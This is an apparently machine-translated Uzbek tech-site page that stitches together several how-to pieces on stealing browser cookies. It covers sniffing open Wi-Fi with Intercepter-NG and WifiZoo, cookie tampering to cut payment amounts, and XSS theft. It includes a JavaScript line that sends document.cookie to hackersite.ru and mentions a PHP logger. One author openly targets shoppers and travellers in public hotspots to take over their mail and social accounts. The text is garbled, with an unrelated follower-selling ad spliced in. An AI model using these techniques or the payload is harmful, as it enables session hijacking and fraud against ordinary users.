Sayt bo'limlari
Muharrir tanlovi:
- Internet tezligini tekshirish: usullarning umumiy ko'rinishi. Provayderingizdan haqiqiy Internet tezligini qanday aniqlash mumkin
- Windows ro'yxatga olish kitobi muharririni ochishning uchta usuli Qidiruv yordamida ro'yxatga olish kitobini ochish
- Qattiq diskni qanday qismlarga bo'lish kerak
- Biz qattiq diskni bo'limlarga ajratamiz
- Kompyuter yoqilganda signal beradi
- Windows-da fayl kengaytmalarini to'g'ri o'zgartirish Arxiv kengaytmasini qanday o'zgartirish mumkin
- YouTube YouTube-da reklamalarni reklamasiz bloklash
- TeamViewer - kompyuterni masofadan boshqarish Boshqa kompyuter bilan bog'lanish uchun dasturni yuklab oling
- Windows-da kompyuteringizning xususiyatlarini qanday aniqlash mumkin: tizim usullari va maxsus dasturlar
- Biz turli xil qurilmalarda brauzerlarni yangilaymiz: kompyuter, planshet, smartfon Yangilangan brauzerni qayerda va qanday qilib o'rnating
Reklama
Cookie-fayllarni qanday tutish kerak. Cookie fayllarini o'g'irlashning oson yo'li |
Ochiq Wi-Fi ulanish nuqtalarining xavf-xatarlari haqida, parollarni qanday tutish mumkinligi haqida. Bugun biz dastur yordamida Wi-Fi orqali parollarni ushlab qolish va Wi-Fi orqali cookie-fayllarni ushlab qolishni ko'rib chiqamiz. Hujum tufayli sodir bo'ladi hidlash.
hidlash— hidlash “Sniff” deb tarjima qilinadi. Sniffing internetdagi tarmoq faoliyatini tahlil qilish, foydalanuvchi qaysi saytlarga tashrif buyurishini ko‘rish va parollarni ushlash imkonini beradi. Ammo undan foydali maqsadlarda, Internetga har qanday ma'lumot yuboradigan viruslarni tinglash uchun ham foydalanish mumkin.
Xizmat avi1 Instagram profilingizga obunachilarga buyurtma berish imkoniyati uchun hayratlanarli darajada arzon narxlarni taklif qiladi. Ko'p kuch va vaqt sarflamasdan, hoziroq onlayn mashhurlikka yoki sotuvga erishing. Intercepter NG dasturi bilan ishlash Shunday qilib, dastur Intercepter-NG.exe orqali ishga tushiriladi. Quyida sozlash bo'yicha video bo'ladi (o'qishdan ko'ra ko'rishni afzal ko'rganlar uchun). — Tugmani bosing Skanerlash rejimi(radar belgisi)
Hammasi shu, biz Wi-Fi orqali parollarni va Wi-Fi orqali cookie-fayllarni ushlab qolishni ko'rib chiqdik. o'zingizni asrang Cookie-fayllar - veb-sayt tomonidan foydalanuvchining kompyuterida saqlangan matn fayli ko'rinishidagi ma'lumotlar. Autentifikatsiya ma'lumotlarini o'z ichiga oladi (login/parol, ID, telefon raqami, manzil pochta qutisi), foydalanuvchi sozlamalari, kirish holati. Brauzer profilida saqlanadi. Cookie faylini buzish veb-resursga tashrif buyuruvchining sessiyasini o'g'irlash (yoki "o'g'irlash"). Shaxsiy ma'lumotlar nafaqat jo'natuvchi va oluvchiga, balki uchinchi shaxsga - ushlashni amalga oshirgan shaxsga ham mavjud bo'ladi. Cookie fayllarini buzish vositalari va usullariKompyuter o'g'rilari, haqiqiy hayotdagi hamkasblari kabi, ko'nikma, epchillik va bilimdan tashqari, albatta, o'z vositalariga ega - asosiy kalitlar va zondlarning o'ziga xos arsenaliga ega. Keling, xakerlar Internet foydalanuvchilaridan cookie-fayllarni olish uchun foydalanadigan eng mashhur hiylalarni ko'rib chiqaylik. SniffersMaxsus dasturlar kuzatish va tahlil qilish uchun tarmoq trafigi. Ularning nomi inglizcha "sniff" (sniff) fe'lidan kelib chiqqan, chunki. tugunlar o'rtasida uzatilgan paketlarni tom ma'noda "chiqib oling". Ammo tajovuzkorlar seans ma'lumotlarini, xabarlarni va boshqalarni ushlab qolish uchun snifferdan foydalanadilar maxfiy ma'lumotlar. Ularning hujumlarining maqsadlari asosan himoyalanmagan tarmoqlar bo'lib, u erda cookie fayllari ochiq HTTP sessiyasida yuboriladi, ya'ni ular amalda shifrlanmagan. (Ommaviy Wi-Fi bu borada eng zaif hisoblanadi.) Foydalanuvchi tuguni va veb-server o'rtasidagi Internet kanaliga snifferni joylashtirish uchun quyidagi usullar qo'llaniladi:
XSS qisqartmasi ma'nosini anglatadi O'zaro sayt Skript yaratish - saytlararo skript yaratish. Foydalanuvchi ma'lumotlarini o'g'irlash uchun veb-saytlarga hujum qilish uchun foydalaniladi. XSS printsipi quyidagicha:
Dasturiy ta'minotning XSS mexanizmini "implantatsiya qilish" uchun xakerlar veb-serverlar, onlayn xizmatlar va brauzerlardagi barcha zaifliklardan foydalanadilar. Barcha XSS zaifliklari ikki turga bo'linadi:
Xakerlar o'zlarining XSS skriptlarini ehtiyotkorlik bilan "kamuflyaj" qilishadi, shunda qurbon hech narsadan shubhalanmaydi. Ular fayl kengaytmasini o'zgartiradilar, kodni tasvir sifatida o'tkazadilar, ularni havolaga rioya qilishga undaydilar va qiziqarli kontent bilan ularni jalb qiladilar. Natijada: o'z qiziqishini boshqara olmaydigan shaxsiy kompyuter foydalanuvchisi o'z qo'li bilan (sichqonchani bosish bilan) XSS skripti muallifi - kompyuter yovuzligiga seans kukilarini (login va parol bilan!) yuboradi. Cookie almashtirishBarcha cookie fayllari saqlanadi va veb-serverga yuboriladi (ular "kelgan") hech qanday o'zgarishsiz - asl shaklida - bir xil qiymatlar, satrlar va boshqa ma'lumotlar bilan. Ularning parametrlarini ataylab o'zgartirish cookie fayllarini almashtirish deb ataladi. Boshqacha qilib aytganda, cookie-fayllarni almashtirganda, hujumchi o'zini orzu qilgandek ko'rsatadi. Masalan, onlayn-do'konda to'lovni amalga oshirayotganda, cookie to'lov miqdorini pastga qarab o'zgartiradi - shuning uchun xaridlarda "tejamkorlik" yuzaga keladi. Ijtimoiy tarmoqdagi boshqa birovning hisobidan o'g'irlangan seans kukilari boshqa seansga va boshqa shaxsiy kompyuterga "qo'shiladi". O'g'irlangan cookie-fayllar egasi o'z sahifasida ekan, jabrlanuvchining akkauntiga (yozuvlar, kontent, sahifa sozlamalari) to'liq kirish huquqiga ega bo'ladi. Cookie-fayllarni “tahrirlash” quyidagilar yordamida amalga oshiriladi:
Ma'lumotlarga jismoniy kirishJuda oddiy sxema amalga oshirish bir necha bosqichlardan iborat. Ammo bu faqat jabrlanuvchining ochiq seansli kompyuteri, masalan, VKontakte, qarovsiz qoldirilgan taqdirdagina samarali bo'ladi (va uzoq vaqt davomida!):
Qoidaga ko'ra, xakerlar yuqoridagi vositalardan (+ boshqalar) birgalikda (chunki ko'plab veb-resurslarda himoya darajasi ancha yuqori) va alohida (foydalanuvchilar haddan tashqari sodda bo'lganida) foydalanadilar. XSS + hidlovchi
Cookie-fayllarni xakerlikdan himoya qilish
Va eng muhimi, dam olish yoki Internetda ishlashda hushyorlik va e'tiborni yo'qotmang! Cookie nima? Http serveriga ba'zi narsalarni saqlashga imkon beruvchi mexanizm mavjud matnli ma'lumotlar, va keyin u bilan bog'laning. Ushbu ma'lumot cookie deb ataladi. Aslida, har bir cookie bir juftlikdir: parametr nomi va uning qiymati. Har bir cookie fayliga u tegishli domen ham tayinlanadi. Xavfsizlik nuqtai nazaridan, barcha brauzerlarda http serveriga faqat o'z domenining cookie-fayllariga kirishga ruxsat beriladi. Bundan tashqari, cookie-fayllar yaroqlilik muddatiga ega bo'lishi mumkin, bu holda ular barcha brauzer oynalarini yopsangiz ham, shu sanagacha kompyuterda saqlanadi. Cookie-fayllar nima uchun muhim? Barcha ko'p foydalanuvchi tizimlari foydalanuvchini aniqlash uchun cookie-fayllardan foydalanadi. Aniqrog'i, foydalanuvchining xizmatga joriy ulanishi, foydalanuvchi sessiyasi. Agar kimdir cookie-fayllaringizni tanisa, u sizning nomingizdan tizimga kirishi mumkin bo'ladi. Chunki ichida hozirda juda oz sonli Internet resurslari bitta foydalanuvchi seansi davomida IP-manzil o'zgarishlarini tekshiradi. Cookie-fayllarni qanday o'zgartirish yoki almashtirish kerak? Brauzer ishlab chiquvchilari cookie-fayllarni tahrirlash uchun o'rnatilgan vositalarni taqdim etmaydi. Ammo siz oddiy bloknot bilan o'tishingiz mumkin. 1-qadam: matnli matnli fayl yarating Windows ro'yxatga olish kitobi muharriri 5.00 versiyasi Uni IE_ext.reg nomi ostida saqlang 2-qadam: Yaratilgan fayldan foydalanib, Windows ro'yxatga olish kitobiga o'zgartirishlar qo'shing. 3-qadam: matnli matnli fayl yarating <
script
til = "javascript"> script > Uni C:\IE_ext.htm nomi ostida saqlang 4-qadam: Bizni qiziqtirgan veb-saytga o'tamiz. 5-qadam: Sahifaning bo'sh joyini o'ng tugmasini bosing va menyu bandini tanlang "Cookie-fayllar bilan ishlash". Buferga kirishga ruxsat bering. Ushbu saytdagi cookie-fayllaringiz vaqtinchalik xotiraga o'tadi. Siz ularning bloknotini qo'yishingiz va ko'rishingiz mumkin. 6-qadam: Ba'zi cookie-fayllarni o'zgartirish uchun C:\IE_ext.htm faylini almashtiring test nomi kuki nomi bilan, sinov qiymati- uning ma'nosi haqida, testdomain.ru- sayt domeniga. Agar kerak bo'lsa, shunga o'xshash qatorlarni qo'shing. Boshqarish qulayligi uchun men skriptga o'zgartirishdan oldin va keyin joriy cookie-fayllarning chiqishini qo'shdim: ogohlantirish (external.menuArguments.document.cookie); 7-qadam: 5-bosqichni yana bajaring va keyin sahifani yangilang. Xulosa: biz ushbu Internet-resursga yangilangan cookie-fayllar bilan kiramiz. JavaScript yordamida cookie-fayllarni qanday o'g'irlash mumkin? Agar tajovuzkor jabrlanuvchining kompyuterida o'zboshimchalik bilan JavaScript skriptini bajarish imkoniyatini topsa, u joriy cookie-fayllarni juda oson o'qiy oladi. Misol: var str= document.cookie; Ammo u ularni o'z saytiga o'tkaza oladimi, chunki yuqorida aytib o'tganimdek, JavaScript skripti boshqa domenda joylashgan saytga qo'shimcha tasdiqsiz kira olmaydi? Aniqlanishicha, JavaScript skripti istalgan http serverida joylashgan istalgan tasvirni yuklay oladi. Shu bilan birga, yuklab olish so'rovidagi har qanday matn ma'lumotlarini ushbu rasmga o'tkazing. Misol: http://hackersite.ru/xss.jpg?text_info Shunday qilib, agar siz ushbu kodni ishlatsangiz: var img= yangi rasm(); img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie); keyin cookie "rasm" ni yuklab olish so'rovida tugaydi va tajovuzkorga "ketadi". "Rasm" ni yuklab olish uchun bunday so'rovlarni qanday hal qilish kerak? Buzg'unchi faqat PHP-ni qo'llab-quvvatlaydigan hostingni topishi va u erda quyidagi kodni joylashtirishi kerak:
Keyin ushbu skript uchun barcha so'rov parametrlari faylda saqlanadi log.txt. Oldin tasvirlangan JavaScript skriptini almashtirish qoladi http://hackersite.ru/xss.jpg ushbu PHP skriptiga boradigan yo'lga. Pastki chiziq Men XSS zaifliklaridan foydalanishning eng oddiy usulini ko'rsatdim. Ammo bu shuni ko'rsatadiki, ko'p foydalanuvchili Internet saytida kamida bitta bunday zaiflik mavjudligi tajovuzkorga o'z resurslaridan sizning nomingizdan foydalanishga imkon berishi mumkin. Siz allaqachon tashrif buyurgan saytga qaytganingizda, sayt sizni taniydi va oxirgi marta qo'llagan sozlamalaringiz bilan ochilishini payqadingizmi? Ha, va tez-tez? Bu login, parol, seans identifikatori va tashrifchini aniqlash uchun zarur bo'lgan boshqa o'zgaruvchilar kabi tashrif buyuruvchilar haqidagi ma'lumotlarni saqlaydigan cookie-fayllar tufayli sodir bo'ladi va resursga oxirgi tashrif davomida tanlangan foydalanuvchining afzalliklariga ko'ra sahifa tarkibini ko'rsatadi. WebCookiesSniffer dasturi foydalanuvchiga brauzerda ko'rayotgan saytlarning cookie-fayllari va ularning mazmunini ko'rsatadi. Cookie-fayllarni ko'rishSiz veb-sayt ochasiz va WebCookiesSniffer suratga oladi kukilar real vaqtda. Yordamchi dastur tutilgan barcha cookie-fayllarni xost, so'rov yo'li, cookie faylining umumiy uzunligi, cookie faylidagi o'zgaruvchilar soni va o'zgaruvchilar va qiymatlar nomlari bilan Cookie-ning o'zi haqidagi ma'lumotlarni saqlaydigan jadvalga qo'shadi. WebCookiesSniffer cookie-fayllar haqida to'plangan ma'lumotlarni matn faylida saqlashi mumkin. Dastur shuningdek, barcha yoki tanlangan cookie-fayllar uchun HTML hisobotini yaratish imkoniyatiga ega. Dastur ishlashi uchun WinPcap drayverini o'rnatishingiz kerak (arxivda WebCookiesSniffer bilan birga joylashgan). WebCookiesSniffer dasturining tilini rus tiliga o'zgartirish uchun WebCookiesSniffer_lng.ini faylini (shuningdek, arxivga kiritilgan) yordamchi dastur bilan katalogga ko'chiring. WebCookiesSniffer dasturining skrinshotlari
Salom, bu qisqa maqola, aksincha qisqa Tasvir Men o'zimni bag'ishlashni xohlayman oddiy yo'l tutib olish kukilar V wi-fi tarmoqlari. Men bu erda sizga cookie fayllari nima ekanligini va nima uchun kerakligini aytmayman, agar odam "pishirilgan mahsulotlar" ni ushlab qolishdan manfaatdor bo'lsa; simsiz tarmoqda, menimcha, u nima ekanligini va nima uchun kerakligini bilishi kerak. Men faqat bir narsani aytaman: ushbu fayllardan foydalanib, foydalanuvchilardan autentifikatsiya jarayonidan o'tishni talab qiladigan turli saytlardagi boshqa odamlarning hisoblariga kirishingiz mumkin (masalan, mail.ru, vkontakte.ru va boshqalar). Shunday qilib, keling, boshlaylik. Avval biz ni topishimiz kerak simsiz tarmoq, ochiq Internetga kirish shlyuziga ega va ushbu tarmoq juda ko'p mijozlarga ega bo'lishi maqsadga muvofiqdir. Masalan, yirik savdo markazlari, aeroportlar, turli xil qahvaxonalardagi har qanday tarmoq mos keladi, bunday joylarda odamlar odatda foydalanadilar wi-fi kirish Internetda, pochtani o'qish, turli tanishuv saytlarida hisoblarni tekshirish, LJ va turli forumlarni ko'rish uchun. Bularning barchasi bizga kerak bo'lgan narsadir. Tarmoqning joylashishini tanlashga qaror qilib, mijozlarning maksimal sonining ma'lum soatlarini o'rganib, to'g'ridan-to'g'ri jangovar operatsiyalarga o'tamiz. Buning uchun bizga noutbuk kerak wi-fi adapteri, va ma'lum dasturlar to'plami. Mening vaziyatimda men foydalanardim Acer noutbuk Aspire 3610, D-Link DWL G650 mijoz wi-fi kartasi va BackTrack3 OS o'rnatilgan. Men sizga ushbu OS dan foydalanishni maslahat beraman, chunki u allaqachon sizga kerak bo'lishi mumkin bo'lgan barcha dasturlarni o'z ichiga oladi va eng muhim afzalligi shundaki, siz Backtrack-ni o'rnatishingiz shart emas. qattiq disk, siz ushbu OSni to'g'ridan-to'g'ri CD yoki flesh-diskdan yuklashingiz mumkin. Endi kerakli dasturiy ta'minotga o'tamiz. Men tarmoqni topish uchun kismet-dan, cookie-fayllarni tutib olish uchun WifiZoo-dan foydalanardim. Men ikkinchi dastur haqida batafsil to'xtalib o'taman. WifiZoo passiv to'lqinli skaner bo'lib, juda ko'p narsalarni to'playdi foydali ma'lumotlar, masalan: pop3, smtp trafiki, http cookie/authinfo, msn, ftp hisob ma'lumotlari, telnet tarmog'i trafigi, nbt va boshqalar. Ushbu dasturning yagona kamchiliklari - bu kanalga o'tish rejimining yo'qligi, WifiZoo shunchaki simsiz interfeysni tinglaydi va ta'bir joiz bo'lsa, kanaldan kanalga o'tolmaydi. Ammo bu kamchilik ushbu rejimni qo'llab-quvvatlaydigan boshqa dastur - Kismet tomonidan qoplanadi. WifiZoo-ni ishga tushirish uchun sizga kerak bo'ladi:
Shunday qilib, dasturni ishga tushiramiz, avval kanalga o'tish rejimini qo'llab-quvvatlash uchun Kismet-ni ishga tushiramiz, keyin to'g'ridan-to'g'ri WifiZoo-ni ishga tushiramiz, sizning oldingizda quyidagi oyna paydo bo'lishi kerak: Endi faqat o'tirib, biror narsani ushlab turguningizcha kutish qoladi; dastur ushlab turgan hamma narsani /logs/ dasturi bilan katalogda joylashgan jurnallarda topish mumkin. 127.0.0.1:8000 da http ga avtomatik ravishda ulanadigan GUI interfeysini ham ishga tushirishingiz mumkin. Men ushbu ajoyib dasturning barcha xususiyatlari haqida yozmayman, o'ylaymanki, siz boshqa xususiyatlarni o'zingiz aniqlaysiz va hozirgi paytda biz faqat cookie-fayllarga qiziqamiz. Cookie-fayllar yozilgan havolani bosing va biz nima tutganimizni ko'ring: |
Mashhur:
Yangi
- Windows ro'yxatga olish kitobi muharririni ochishning uchta usuli Qidiruv yordamida ro'yxatga olish kitobini ochish
- Qattiq diskni qanday qismlarga bo'lish kerak
- Biz qattiq diskni bo'limlarga ajratamiz
- Kompyuter yoqilganda signal beradi
- Windows-da fayl kengaytmalarini to'g'ri o'zgartirish Arxiv kengaytmasini qanday o'zgartirish mumkin
- YouTube YouTube-da reklamalarni reklamasiz bloklash
- TeamViewer - kompyuterni masofadan boshqarish Boshqa kompyuter bilan bog'lanish uchun dasturni yuklab oling
- Windows-da kompyuteringizning xususiyatlarini qanday aniqlash mumkin: tizim usullari va maxsus dasturlar
- Biz turli xil qurilmalarda brauzerlarni yangilaymiz: kompyuter, planshet, smartfon Yangilangan brauzerni qayerda va qanday qilib o'rnating
- Protsessor, video karta, quvvat manbai va kompyuter sovutgichini qanday moylash kerak